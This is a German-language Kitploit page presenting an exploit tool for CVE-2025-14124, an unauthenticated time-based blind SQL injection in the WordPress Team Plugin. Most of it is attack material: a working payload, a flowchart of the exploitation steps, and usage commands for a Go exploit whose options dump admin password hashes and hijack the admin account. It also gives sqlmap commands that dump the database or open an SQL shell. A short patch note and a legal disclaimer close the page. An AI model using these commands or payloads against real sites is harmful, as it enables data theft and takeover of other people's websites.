Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-14124 — Unauthentifizierte SQL Injection (zeitbasierte Blind) | Kitploit
Tools/GitHubGitHub/hyunchiya/cve-2025-14124
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubhyunchiya/cve-2025-14124

CVE-2025-14124

Unauthentifizierte SQL Injection (zeitbasierte Blind)

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-14124

WordPress Team Plugin - Nicht authentifizierte SQL-Injection

Autor: Hyun Chiya


Schwachstelleninformationen

Tool herunterladen
FeldWert
CVE-IDCVE-2025-14124
PluginWordPress Team Plugin
Betroffene Versionen< 5.0.11
SchwachstellentypNicht authentifizierte SQL-Injection (zeitbasierte blinde)
SchweregradHoch

Beschreibung

Das WordPress Team Plugin bereinigt und escaped den Parameter search nicht ordnungsgemäß, bevor er in einer SQL-Anweisung über eine AJAX-Aktion verwendet wird, die nicht authentifizierten Benutzern zur Verfügung steht, was zu einer SQL-Injection führt.

Root-Cause-Analyse

Der anfällige Code befindet sich in app/Controllers/Frontend/Ajax/LoadMore.php:

root@kitploit:~
// Zeile 221 - Benutzereingabe bereinigt, aber NICHT SQL-escaped
$sAction = sanitize_text_field( wp_unslash( $_REQUEST['search'] ) );

// Zeile 437-438 - ANGREIFBAR: Direkte SQL-Verkettung
function tlp_team_search_where( $where ) {
    global $wpdb;
    $term = $wpdb->esc_like( $this->s['s'] );  // ⚠️ esc_like escaped nur %, _, \
    $where .= "OR ({$wpdb->posts}.post_title LIKE '%{$term}%' ...)";  // ⚠️ SQLi!
}

Problem: $wpdb->esc_like() escaped nur LIKE-Wildcards, NICHT SQL-Injection-Metazeichen.

Exploitation-Ablauf

root@kitploit:~
flowchart TD
    A["Angreifer findet Seite mit [tlpteam] Shortcode"] --> B["Extrahiere tlp_nonce und data-sc-id"]
    B --> C["POST an /wp-admin/admin-ajax.php"]
    C --> D["action=ttp_Layout_Ajax_Action<br/>search=SQL_PAYLOAD"]
    D --> E{"Nonce gültig?"}
    E -->|Ja| F["SQL-Abfrage mit Payload ausgeführt"]
    F --> G["Zeitbasierte Erkennung mittels SLEEP()"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
    style G fill:#51cf66,stroke:#2f9e44,color:#fff

Voraussetzungen

  1. Ziel hat WordPress Team Plugin installiert (< 5.0.11)
  2. Eine Seite mit [tlpteam] Shortcode muss existieren
  3. Mindestens ein Teammitglied im Plugin erstellt

Build

root@kitploit:~
go build -o CVE-2025-14124.exe main.go

Verwendung

Team-Seite automatisch erkennen

root@kitploit:~
.\CVE-2025-14124.exe -u http://target.com

Team-Seiten-URL angeben

root@kitploit:~
.\CVE-2025-14124.exe -u http://target.com --page-url http://target.com/our-team/

Nur Plugin prüfen

root@kitploit:~
.\CVE-2025-14124.exe -u http://target.com --check-only

Benutzerdefinierte SLEEP-Verzögerung

root@kitploit:~
.\CVE-2025-14124.exe -u http://target.com --delay 5

Optionen

ArgumentBeschreibung
-uZiel-WordPress-URL (erforderlich)
--page-urlSeiten-URL mit tlpteam Shortcode
--delaySLEEP-Sekunden für Erkennung (Standard: 1)
--dumpDatenbankinformationen und WordPress-Admin-Anmeldedaten extrahieren
--create-adminVersuch, Admin-Konto zu kapern (erfordert gestapelte Abfragen)
--admin-userBenutzername für Admin-Übernahme (Standard: pwned_admin)
--admin-passPasswort für Admin-Übernahme (Standard: Pwned123!)
--check-onlyNur prüfen, ob Plugin aktiv ist
--timeoutAnforderungs-Timeout in Sekunden (Standard: 120)

Daten-Extraktionsmodus (--dump)

Bei Verwendung von --dump extrahiert das Tool:

  • Datenbankversion
  • Aktuellen Datenbanknamen
  • Datenbankbenutzer
  • WordPress-Tabellenpräfix
  • Admin-Benutzernamen
  • Admin-Passwort-Hash
  • Admin-E-Mail

Hinweis: Die Datenextraktion ist aufgrund der Natur der zeitbasierten blinden SQL-Injection langsam (~5-15 Minuten für vollständige Extraktion).

Admin-Übernahmemodus (--create-admin)

Versucht, das vorhandene Admin-Passwort über ein SQL-UPDATE zu ändern.

⚠️ Wichtig: Dieser Modus erfordert gestapelte Abfragen-Unterstützung, die in PHP+MySQL normalerweise deaktiviert ist. Wenn gestapelte Abfragen nicht unterstützt werden, verwenden Sie stattdessen --dump zum Extrahieren der Anmeldedaten oder sqlmap --sql-shell für die direkte UPDATE-Ausführung.

Beispielausgabe

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14124 - WordPress Team Plugin SQL Injection                                ║
    ║   Betroffen: tlp-team < 5.0.11                                                         ║
    ║   Autor: Hyun Chiya                                                                   ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]

[*] Überprüfe, ob das WordPress Team Plugin aktiv ist...
[+] Plugin erkannt: /wp-content/plugins/tlp-team/readme.txt
[+] Plugin erkannt!

[*] Suche nach Seite mit tlpteam Shortcode...
[+] Team-Seite gefunden: http://target.com/our-team/
[+] Zielseite: http://target.com/our-team/

[+] Nonce extrahiert: abc123def456
[+] scID extrahiert: 42

============================================================
[*] EXPLOIT: Zeitbasierte blinde SQL-Injection
============================================================

[*] Payload: t' OR SLEEP(3) OR 't'='t
[*] Erwartete Verzögerung: ~9 Sekunden (SLEEP wird 3 Mal ausgeführt)

[*] Sende schädliche Anfrage...
[*] Antwortzeit: 9.23 Sekunden

[+] SQL-INJEKTION BESTÄTIGT!
[+] Antwort um ~9 Sekunden verzögert (erwartet: 9)

[!] Das Ziel ist anfällig für zeitbasierte blinde SQL-Injection
[!] Datenbank kann mit Tools wie sqlmap extrahiert werden

[*] Fertig.

Verwendung mit SQLMap

Für fortgeschrittene Ausnutzung können Sie sqlmap verwenden, nachdem Sie die Schwachstelle bestätigt haben:

root@kitploit:~
# Datenbank dumpen
sqlmap -u "http://target.com/wp-admin/admin-ajax.php" \
  --data="action=ttp_Layout_Ajax_Action&scID=32&tlp_nonce=NONCE&search=test" \
  -p search --dbms=mysql --technique=T --batch --dump

# SQL-Shell (für UPDATE-Abfragen)
sqlmap -u "http://target.com/wp-admin/admin-ajax.php" \
  --data="action=ttp_Layout_Ajax_Action&scID=32&tlp_nonce=NONCE&search=test" \
  -p search --dbms=mysql --technique=T --sql-shell

Behebung

⚠️ WICHTIG: Aktualisieren Sie das WordPress Team Plugin auf Version 5.0.11 oder höher, in der die Schwachstelle mit korrektem SQL-Escaping mittels $wpdb->prepare() behoben wurde.

Referenzen

  • WPScan Schwachstellendatenbank

Haftungsausschluss

Dieses Tool wird nur für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie es verantwortungsvoll.

Autor

Hyun Chiya